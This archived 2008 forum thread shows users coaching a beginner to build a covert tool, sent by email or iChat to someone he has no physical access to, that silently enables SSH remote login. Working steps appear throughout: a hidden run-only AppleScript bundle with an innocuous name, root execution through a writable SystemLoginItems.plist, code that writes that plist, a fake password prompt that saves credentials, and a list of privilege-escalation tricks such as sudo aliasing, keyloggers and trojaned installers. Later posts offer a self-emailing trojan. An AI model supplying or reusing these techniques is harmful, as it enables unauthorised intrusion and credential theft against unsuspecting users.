lokin
May 18 2008, 04:44 PM
******** EDIT Begins **********
6/25/08 EDIT *IMPORTANT* For Visitors:
QUOTE
The following links to our knowledge base contain further information on this subject, including
Solutions, Discovery, Templates, and more:
ARDAgent exploit &
Com.apple.SystemLoginItems.plist Exploit- Spratt_
******** EDIT Complete **********
So the deal is I'm trying to write a script that will locate preferences--->sharing--->and then select remote login if there is write privileges.
This will be my first attempt at making something that does this so please give me a break.
what language should I use? perl?
what compiler? Xcode?
The program also has to run in the background or imbed it in a file or document of some kind.
Once again I have no experience here so please help all you can.
p.s. please don't write the code and say heres an example, I'll end up copying most of it.
callmenames
May 18 2008, 05:08 PM
QUOTE(callmenames @ May 17 2008, 10:06 AM)
Stop trying to script the graphic interface (it's just a pretty picture that lets you change settings in a preference file), figure out in which files it changes the settings, have your script check whether you have write access to the files and modify the files with your script.
lokin
May 18 2008, 09:54 PM
And I have.
I've forgotten all about preference panes and whatever but as far as I know, so far, is that all preferences are still located in a file called Preferences. No?
And then sharing would be located in that file. And if not located there, there would be something like C++ pointers or shortcuts.
Although I now now that this is not the case.
and don't forget
QUOTE
Once again I have no experience here so please help all you can.
callmenames
May 18 2008, 10:24 PM
Ok, step one is to figure out which file(s) are changed when you click the box in System Preferences to enable remote login. There are a variety of ways to see which files are accessed. From the GUI, try fseventer. From the command line, fseventer, fs_usage, and potentially ps -axww (if filenames are passed to a command which is not too likely in this case) and lsof (if you are quick.) All of the options will work best if you quit everything, have as little running as possible. Get ready to make the change in the GUI, start whatever method you wish to try to see what files are accessed, click in the GUI to make the change (and APPLY if necessary) then quickly switch back to your tool of choice to stop it (unless you are using ps / lsof which don't run continuously.)
callmenames
May 19 2008, 01:31 PM
For instance... restart. Open Terminal and type...
CODE
sudo -s
QUOTE
Password:
PowerBook:~ root#
Your password won't be displayed as you type which is normal, just type it in and press return.
Then open System Preferences, go to sharing. Disable File Sharing if it is on.
Switch back to Terminal. Make the window wide (height does not matter, width does.) Position the Terminal window and the System Preferences window so that you can see the "Start" button to enable File Sharing. In Terminal, type the command 'fs_usage', press return and quickly click the Start button in System Preferences (click once to bring the window forward, click again to start.) Quickly switch back to the Terminal window and type command-period or control-c to cancel fs_usage.
CODE
fs_usage
I ran this on a Tiger 10.4.11 PPC system...
QUOTE
11:18:15.213 lstat private/etc/hostconfig~ 0.000259 W writeconfig
11:18:15.213 statfs private/etc/hostconfig~ 0.000032 writeconfig
11:18:15.213 lstat private/etc/hostconfig~ 0.000018 writeconfig
11:18:15.213 unlink private/etc/hostconfig~ 0.000524 writeconfig
11:18:15.214 lstat [ 2] private/etc/hostconfig~ 0.000094 writeconfig
11:18:15.214 getattrlist private/etc 0.000047 writeconfig
11:18:15.214 getattrlist private/etc 0.000023 writeconfig
11:18:15.214 getattrlist /.vol/234881038/3118/hostconfig 0.000095 writeconfig
11:18:15.214 getattrlist /.vol/234881038/1740430 0.000031 writeconfig
11:18:15.214 getattrlist [ 2] /.vol/234881038/3118/hostconfig~ 0.000050 writeconfig
11:18:15.215 rename /.vol/234881038/3118/hostconfig 0.000529 writeconfig
11:18:15.215 lstat [ 2] private/etc/hostconfig 0.000101 writeconfig
11:18:15.215 stat [ 2] private/etc/hostconfig 0.000048 writeconfig
11:18:15.216 open F=5 private/etc/.dat2253.002 0.000469 writeconfig
11:18:15.216 write F=5 B=0xe3 0.000167 writeconfig
11:18:15.217 WrData[async] D=0x0754e160 B=0x1000 /dev/disk1s10 0.000449 W writeconfig
11:18:15.220 fsync F=5 0.003592 W writeconfig
11:18:15.220 close F=5 0.000064 writeconfig
11:18:15.221 rename private/etc/.dat2253.002 0.000610 writeconfig
11:18:15.221 chmod private/etc/hostconfig 0.000212 writeconfig
The modified file is /etc/hostconfig, here is mine with sharing on.
CODE
cat /etc/hostconfig
QUOTE
AFPSERVER=-YES-
AUTHSERVER=-NO-
AUTOMOUNT=-YES-
CUPS=-AUTOMATIC-
NFSLOCKS=-AUTOMATIC-
NISDOMAIN=-NO-
TIMESYNC=-YES-
QTSSERVER=-NO-
WEBSERVER=-NO-
SMBSERVER=-NO-
SNMPSERVER=-NO-
SPOTLIGHT=-YES-
CRASHREPORTER=-YES-
ARDAGENT=-NO-
... and off
QUOTE
AFPSERVER=-NO-
AUTHSERVER=-NO-
AUTOMOUNT=-YES-
CUPS=-AUTOMATIC-
NFSLOCKS=-AUTOMATIC-
NISDOMAIN=-NO-
TIMESYNC=-YES-
QTSSERVER=-NO-
WEBSERVER=-NO-
SMBSERVER=-NO-
SNMPSERVER=-NO-
SPOTLIGHT=-YES-
CRASHREPORTER=-YES-
ARDAGENT=-NO-
lokin
May 19 2008, 01:48 PM
Ok, well using fseventer I found that just clicking the remote login I get system-->library-->launchDaemons-->ssh.plist
and private-->var-->log-->secure.log and system.log.
When I select it and deselect it a couple times the ssh.plist changes and gets uses next to it so that has to be what I need to change.
The problem I'm having though is that i can't find these items in my terminal.
callmenames
May 19 2008, 01:55 PM
CODE
ls -alo /System/Library/LaunchDaemons/ssh.plist
QUOTE
-rw-r--r-- 1 root wheel - 858 May 14 11:06 /System/Library/LaunchDaemons/ssh.plist
One way to change the file from the command line would be like so...
CODE
launchctl load -w /System/Library/LaunchDaemons/ssh.plist
And to see the contents of that file...
CODE
cat /System/Library/LaunchDaemons/ssh.plist
QUOTE
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Disabled</key>
<true/>
<key>Label</key>
<string>com.openssh.sshd</string>
<key>Program</key>
<string>/usr/libexec/sshd-keygen-wrapper</string>
<key>ProgramArguments</key>
<array>
<string>/usr/sbin/sshd</string>
<string>-i</string>
</array>
<key>SessionCreate</key>
<true/>
<key>Sockets</key>
<dict>
<key>Listeners</key>
<dict>
<key>Bonjour</key>
<array>
<string>ssh</string>
<string>sftp-ssh</string>
</array>
<key>SockServiceName</key>
<string>ssh</string>
</dict>
</dict>
<key>StandardErrorPath</key>
<string>/dev/null</string>
<key>inetdCompatibility</key>
<dict>
<key>Wait</key>
<false/>
</dict>
</dict>
</plist>
lokin
May 20 2008, 02:04 AM
Ok. I get it.
The next problem is that that command has to be run root.
So is there any other way to do this other than make a box popup that says its a software update or something and they need to type there password. Once typed (and entered) it will store it as a plain text document and then after
CODE
sudo launchctl load -w /System/Library/LaunchDaemons/ssh.plist
it will enter the contents of the password file?
Do I at least have the right idea?
callmenames
May 20 2008, 12:29 PM
There are ways to have things run under the root account without any interaction from a user at all. They vary from one version of OS X to another. I would suggest becoming familiar with the
OS X startup process. One method is used in an example
here.
lokin
May 20 2008, 07:41 PM
So, If I add launchctl load -w /System/Library/LaunchDaemons/ssh.plist to an executable file in startup it will run without needing a password and then to make it so it doesn't give and error every startup there should also be something saying that if its already loaded the don't load launchctl load -w /System/Library/LaunchDaemons/ssh.plist.
...yes?
callmenames
May 20 2008, 08:03 PM
Yes, although what constitutes an 'executable file' or command varies depending on which part of the OS X startup process is active. For instance, Login Items are handled in much the way Finder would handle them. If Finder can't run something, it won't work as a Login Item. A command line for instance, won't work while an AppleScript would and it could issue a command line. Similarly, a Startup Item can't be an AppleScript although a shell script will work.
Launchctl is smart enough not to load the service twice (try it and see what it says.)
lokin
May 21 2008, 12:23 AM
O sweet. how should I save that file? does it matter.
and launchctl load -w /System/Library/LaunchDaemons/ssh.plist isn't exactly applescript is it?
I'm getting a bit lost here...
My objective is to be able to send something via e-mail or Ichat and have them open it and execute.
My original idea was that I would send something (e-mail ichat) and it would run invisible with a self execute timer. I've done that before but never invisible to the user.
So the idea here is that it would copy itself to the startup and then the next time they started up there computer it would launch the ssh loader?
callmenames
May 21 2008, 12:44 AM
How should you save which/what file? An AppleScript? Run only/application bundle with no window and no stay open. A shell script? A text file with execute permissions set on the file.
I thought you didn't want anyone to spoon-feed you a script????
CODE
tell application "System Events" to do shell script "launchctl load -w /System/Library/LaunchDaemons/ssh.plist"
To make an AppleScript run "invisible" (which won't actually be necessary in this case because you are going to have it run prior to the user logging in which means they will never see it anyway but it's a good thing to learn so...) read up on "LSUIElement".
Always keep in mind that there is always more than one way of accomplishing the same goal. In this case, you started by looking at the GUI and asked how to script it, I responded by saying look for the preferences files, which led you to launchctl, which requires root, thus you want to get the startup process to run your script because it is run as root and you won't need to have the user enter a password as long as you have write access to a file which is run or used to run other things in the startup process.
An alternative to all of this, would be to just launch sshd from the user's account.
lokin
May 21 2008, 01:50 AM
QUOTE(callmenames @ May 20 2008, 10:44 PM)
CODE
tell application "System Events" to do shell script "launchctl load -w /System/Library/LaunchDaemons/ssh.plist"
Thats what I need help with.
callmenames
May 21 2008, 01:57 AM
You need more help with it than me giving you the whole AppleScript command? :)
Save as a run-only application. Make it invisible (add LSUIElement boolean yes to the info.plist inside the bundle.) Drop it into /Library/Preferences or anywhere where no one will see it. Set the application as a Login Item in /Library/Preferences/com.apple.SystemLoginItems.plist (if you have write access, which happens sometimes :) ) Then it will be run by root at restart.
lokin
May 21 2008, 02:30 AM
You're a quick one to reply...
I was under the impression that Run-Only applications was more of a parental control kinda thing. And how would you save a text document to run only? extension?
callmenames
May 21 2008, 02:44 AM
Inside the Applications folder should be a folder named "AppleScript". Within that folder is a program named Script Editor. Run it, paste in the command line. Save as Application Bundle, check Run Only, leave Startup Screen unchecked and name it something innocuous like "AdjustGamma". Then open the bundle (control-click on it once, select "Show package contents") and edit the info.plist file. If you have XCode or Developer Tools installed you can use Property List Editor, otherwise use TextEdit.
QUOTE
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CFBundleAllowMixedLocalizations</key>
<true/>
<key>CFBundleDevelopmentRegion</key>
<string>English</string>
<key>CFBundleExecutable</key>
<string>applet</string>
<key>CFBundleIconFile</key>
<string>applet</string>
<key>CFBundleInfoDictionaryVersion</key>
<string>6.0</string>
<key>CFBundleName</key>
<string>GammaAdjust</string>
<key>CFBundlePackageType</key>
<string>APPL</string>
<key>CFBundleSignature</key>
<string>aplt</string>
<key>LSRequiresCarbon</key>
<true/>
<key>WindowState</key>
<dict>
<key>name</key>
<string>ScriptWindowState</string>
<key>positionOfDivider</key>
<real>274</real>
<key>savedFrame</key>
<string>39 473 439 460 0 0 1280 938 </string>
<key>selectedTabView</key>
<string>result</string>
</dict>
</dict>
</plist>
QUOTE
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CFBundleAllowMixedLocalizations</key>
<true/>
<key>CFBundleDevelopmentRegion</key>
<string>English</string>
<key>CFBundleExecutable</key>
<string>applet</string>
<key>CFBundleIconFile</key>
<string>applet</string>
<key>CFBundleInfoDictionaryVersion</key>
<string>6.0</string>
<key>CFBundleName</key>
<string>GammaAdjust</string>
<key>CFBundlePackageType</key>
<string>APPL</string>
<key>CFBundleSignature</key>
<string>aplt</string>
<key>LSRequiresCarbon</key>
<true/>
<key>LSUIElement</key>
<true/>
</dict>
</plist>
Then test it!
:)
lokin
May 21 2008, 02:59 AM
So close.... gotta love a syntax error
A identifier can’t go after this identifier. launchctl load
any ideas? its all setup right
name is LoginSettup its application bundle, and run only is selected.
callmenames
May 21 2008, 03:02 AM
lokin
May 21 2008, 03:20 AM
Hmm well I did all that it was found in my login items I selected it. Restarted my computer and remote login wasn't loaded.
callmenames
May 21 2008, 11:06 AM
What does 'found in my log in items' mean?
callmenames
May 21 2008, 05:45 PM
Do you have write access to /Library/Preferences/com.apple.SystemLoginItems.plist ? (Which is where the entry to make the run-only script a Login Item should be placed.)
lokin
May 21 2008, 07:05 PM
QUOTE
What does 'found in my log in items' mean?
system preferences > accounts > login items > AVPN.Agent
I can't find com.apple.SystemLoginItems.plist
am I simply looking it over?
CODE
com.apple.headerdoc.exampletocteplate.html
com.apple.headerDoc2HTML.config
SystemConfiguration
com.apple.ByteRangeLocking.plist
com.apple.dockfixup.plist
com.apple.xgrid.controller.plist
com.apple.xgrid.agent.plist
com.apple.pcast_integration.plist
com.apple.Catapult.plist
DirectoryService
com.apple.security.systemidentities.plist
com.apple.CoreRAIDServer.cfdb
com.apple.iLife08.plist
com.apple.SetupAssistant.plist
com.apple.HIToolbox.plist
com.apple.audio.SystemSettings.plist
com.apple.ARDAgent.plist
com.apple.RemoteManagement.plist
com.apple.RemoteManagement.launchd
com.apple.loginwindow.plist
com.apple.BezelServices.plist
com.apple.SoftwareUpdate.plist
com.apple.Bluetooth.plist
com.apple.java.util.prefs.plist
com.apple.windowserver.plist
com.apple.AppleFileServer.plist
com.apple.alf.plist
com.apple.driver.AppleIRController.plist
com.apple.virtualMemory.plist
com.apple.iPod.plist
com.apple.TimeMachine.plist
com.apple.keyboardtype.plist
com.stuffit.agreement.plist
Adobe Systems
com.adobe.AdobePDFSettings.plist
com.apple.AppleShareClient.plist
com.apple.driver.AppleUSBDisplays.plist
FLEXnet Publisher
com.apple.audio.DeviceSettings.plist
com.apple.mediaio.DeviceSettings.plist
callmenames
May 21 2008, 07:31 PM
The Login Items shown in System Preferences are run not as root but as the user from who's account they are loaded. No, you aren't overlooking com.apple.SystemLoginItems.plist - it just isn't there yet. Create it...
QUOTE
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>AutoLaunchedApplicationDictionary</key>
<array>
<dict>
<key>Path</key>
<string>/Library/Preferences/Your_run_only_AppleScript</string>
</dict>
</array>
</dict>
</plist>
lokin
May 21 2008, 07:46 PM
ok made it in textedit added the name of my script saved it as com.apple.SystemLoginItems.plist in prefrences.
It says the document com.apple.SystemLoginItems.plist cannot be opened.
callmenames
May 21 2008, 07:58 PM
What says that?
lokin
May 21 2008, 09:03 PM
system preferences.
callmenames
May 21 2008, 09:37 PM
What can I do to convince you to stay out of System Preferences? :)
Seriously, the Login Items that you set in System Preferences will NOT run as root, they run as the user! This is not what you want.
If you have already placed the com.apple.SystemLoginItems.plist file in /Library/Preferences and if that file specifies the path to your run only AppleScript bundle... then you are good to go. Just make sure SSH is off and then restart and check SSH again.
lokin
May 21 2008, 10:44 PM
Lol, ya I know you've pointed that out.
It still isn't working.
lokin
May 21 2008, 10:47 PM
And everything as far as I can tell is in place.(except I still think that because com.apple.SystemLoginItems.plist isn't opening is the problem)
callmenames
May 21 2008, 11:13 PM
What does "It still isn't working" mean? When you restart, do you see the name of your script on the menubar just prior to or just after login? Do you get any error messages in the log files regarding the script or com.apple.SystemLoginItems.plist ? What do you mean when you say that it won't open - what are you trying to open it with which tells you that it won't open?
lokin
May 21 2008, 11:47 PM
When I simply try and open com.apple.SystemLoginItems.plist from the finder it says
The document “ com.apple.SystemLoginItems.plist” could not be opened.
QUOTE
When you restart, do you see the name of your script on the menubar just prior to or just after login
no.
And I can't find any errors in the log messages.
callmenames
May 22 2008, 12:03 AM
And if you run Terminal and enter
ssh 127.0.0.1
What happens?
By the way, to open the plist file, control-click and "Open with..." TextEdit.
lokin
May 22 2008, 01:27 AM
Well if I ssh my self then it does nothing considering that it hasn't worked yet. But if I manually start remote login through launchctl load or system preferences then when I ssh my self I'm prompted for the password, type it in and it works like any other ssh.
I made a quick edit to the XML in the plist because I thought I had found the error.
Does the apple script have to be located in /Library/Preferences?
CODE
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>AutoLaunchedApplicationDictionary</key>
<array>
<dict>
<key>Path</key>
<string>/Library/Preferences/RLoginSetup</string>
</dict>
</array>
</dict>
</plist>
to
CODE
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>AutoLaunchedApplicationDictionary</key>
<array>
<dict>
<key>Path</key>
<string>username/Desktop/Projects/RemoteLogin/RLoginSetup</string>
</dict>
</array>
</dict>
</plist>
callmenames
May 22 2008, 01:36 AM
No, the AppleScript run-only application bundle can be pretty much anywhere _as long as you put the correct path in the plist_. Which incidentally would be...
/Users/username/Desktop/Projects/RemoteLogin/RLoginSetup
And you can't use ~ because it's going to be run by root and root's home is /var/root
lokin
May 22 2008, 04:04 AM
Well it all seems to be in order, I'll play around with it a bit to see if I can get it to work.
Squid
May 22 2008, 04:04 PM
Hehe, I remember writing an applescript that did this a while ago. I wonder if I still have it...
lokin
May 23 2008, 02:28 AM
Was it similar?
My main problem is that once I have it working then I need it to make and save the plist automatically...
callmenames
May 23 2008, 10:34 AM
You could place the file inside your application bundle and then copy it.
Or create it using AppleScript.
CODE
try
set thefile to POSIX file "/Library/Preferences/com.apple.SystemLoginItems.plist"
open for access thefile with write permission
set eof of thefile to 0
write "<?xml version=\"1.0\" encoding=\"UTF-8\"?>
<!DOCTYPE plist PUBLIC \"-//Apple Computer//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">
<plist version=\"1.0\">
<dict>
<key>AutoLaunchedApplicationDictionary</key>
<array>
<dict>
<key>Path</key>
<string>/Library/Preferences/RLoginSetup99</string>
</dict>
</array>
</dict>
</plist>" to thefile
close access thefile
end try
Or create the file with a shell command.
CODE
echo '<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>AutoLaunchedApplicationDictionary</key>
<array>
<dict>
<key>Path</key>
<string>/Library/Preferences/RLoginSetup</string>
</dict>
</array>
</dict>
</plist>' > /Library/Preferences/com.apple.SystemLoginItems.plist
Squid
May 24 2008, 04:07 AM
QUOTE(lokin @ May 23 2008, 03:28 AM)
Was it similar?
My main problem is that once I have it working then I need it to make and save the plist automatically...
If I remember, I never really completed it. So I had a crappy dialog appear and ask for a password, which it would store in an applescript variable. I planned on improving the way I retrieved that password, but never got around to it. After that, I had it run the shell command callmenames mentioned, sudo launchctl load -w /System/Library/LaunchDaemons/ssh.plist. It would use the stored password when called for. After it enabled SSH, I would connect to the other computer and retrieve the password.
I think that's how I did it...
Talking about this makes me want to rewrite my script.
Oktane
May 24 2008, 09:21 AM
I think I'm missing pieces here can you explain in detail what you need to do so that I can help. I would like to contribute the shell of the Trojan I made a little while ago. It is a Xcode project of applescript and it looks like an image or whatever you want then runs behind the scenes (if you know what I mean) it can email itself with your address book if you include that aspect.
I under stand how this works:
CODE
tell application "System Events" to do shell script "launchctl load -w /System/Library/LaunchDaemons/ssh.plist"
I also understand that we need root to make it run so we are going to insert it into the start up items, just explain what needs to go where and I'll try to help you out. If you want the help I'll post how to make that "shell of a trojan."
callmenames
May 24 2008, 11:46 AM
GOAL: Enable Remote Login without user interaction
- Must have root privileges to enable the Remote Login / ssh service in it's standard implementation by Apple.
- root privileges can be gained in a variety of ways such as: through weak permissions on /Library/Preferences/com.apple.SystemLoginItems.plist; through weak permissions on /Library/StartupItems (more likely on pre-Tiger systems); waiting for sudo to be used and then piggy-backing during sudo's alotted timestamp period (usually 5 minutes, check /etc/sudoers); capturing passwords when sudo is invoked (for instance by aliasing sudo) and then testing the sudo access level gained from the password until a sufficiently privileged account is available; various public exploits depending on OS version; brute-force sudo or any running service; trojan-horse an app or installer which requires superuser or root privileges (and which is likely to be used); keylogger (obviously one which does not require root privileges to install); Single-user Mode (may require Open-Firmware / EFI reset which may require physical access or at the very least an account sufficiently privileged to sudo nvram -p); Target Disk Mode (requires physical access, FireWire or SCSI on older Macs); yank the hard drive and install it in another Mac or an external case (requires physical access); there is always a way.
- Alternately, implement a different SSH or Telnet service (or use custom configuration to use Apple's) under the current user's account.
- If changes are to be made programatically then obviously a program is needed. Type of program depends largely on method. If using com.apple.SystemLoginItems.plist, an AppleScript compiled as a run-only bundle will do the job.
QUOTE
on enable_ssh()
tell application "System Events"
try
do shell script "launchctl load -w /System/Library/LaunchDaemons/ssh.plist 2>/dev/null"
end try
end tell
end enable_ssh
enable_ssh
callmenames
May 24 2008, 03:43 PM
Incidentally, launchctl only applies to 10.4 and 10.5. For 10.3 and prior the setting is in /etc/hostconfig and is either "SSHSERVER=-YES-" or "SSHSERVER=-NO-"
lokin
May 25 2008, 02:52 PM
That was my original idea.
Because making it run on startup wouldn't give me the password. and so I wouldn't be able to ssh to the computer.
oktane
What I want to happen is to send something through ichat or email and once the receiver opens it it would either...
1) copy its self to systemloginitems and turn on remote login next time they reboot, but the problem is that I won't have their password.
2) make "launchctl load -w /System/Library/LaunchDaemons/ssh.plist" a command and then once it's installed have a simple pop down box that asks for the password and stores the password in a .txt file somewhere in their system and then when "sudo launchctl load -w /System/Library/LaunchDaemons/ssh.plist" goes it can call on that txt file for the password.
Thats all I'm shooting for right now but then it would also be nice for their computer to forward that txt file with the password.
P.S. Everything I will be doing is on either a 10.4 or 10.5 system.
callmenames
May 25 2008, 02:57 PM
Are you saying that you have no access, at all, to the computer?
If you are able to write to com.apple.SystemLoginItems.plist you can run pretty much anything, as root, with no password needed. For instance, you can create your own hidden admin user account and use that with SSH.
lokin
May 25 2008, 09:22 PM
Ya chances are I won't ever have physical access to the computer.
callmenames
May 25 2008, 10:07 PM
Sigh. So then your actual question is either how to gain sufficient control over the remote computer to be able to enable SSH -or- how to cause the user to unwittingly enable SSH...
Is the user an absolute moron with admin privileges on the system by any chance?
Oktane
May 25 2008, 10:46 PM
It would be nice if the trojan emailed you the targets:
1. IP-Address
2. Username
3. Password
4. OS and vulnerable services
Then either install a SSH program or enable the default
callmenames
May 25 2008, 11:12 PM
No point even discussing that part until the big mystery of how you are going to get anything to occur on the remote computer is solved, don't ya think?
lokin
May 26 2008, 02:55 AM
QUOTE
Is the user an absolute moron with admin privileges on the system by any chance?
Why yes he is!
And honestly the answer to the big problem may be as simple as making a GUI that will save his login name and password.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please
click here.
